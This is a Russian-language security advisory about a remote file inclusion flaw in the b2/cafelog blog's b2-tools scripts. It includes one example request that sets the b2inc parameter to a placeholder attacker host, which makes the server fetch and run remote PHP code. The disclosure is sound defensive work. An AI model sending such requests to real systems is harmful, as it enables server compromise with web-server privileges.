Security Lab

Выполнение произвольного PHP кода и команд операционной системы в 'b2' Blog 'b2tools'

Дата публикации:02.06.2003
Всего просмотров:1228
Опасность:
Высокая
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Wordpress 0.x (b2 cafelog)
Описание: Уязвимость обнаружена в 'b2' weblog. Удаленный пользователь может выполнить произвольные команды на целевом сервере.

Сообщается, что сценарии 'blogger-2-b2.php' и 'gm-2-b2.php' в 'b2-tools' каталоге уязвимы к удаленному внедрению произвольного кода.

Удаленный пользователь может определить значение для $b2inc переменной к файлу, расположенному на удаленном сервере, который будет выполнен на целевом сервере, с привилегиями web демона. Пример:

http://[target]/b2-tools/gm-2-b2.php?b2i nc=http://[attacker]
Будет включен файл 'b2functions.php', расположен на удаленном сервере.

Уязвимость обнаружена в 'b2' Blog 'b2tools' 0.6.1

Ссылки: b2 cafelog 0.6.1 remote command execution.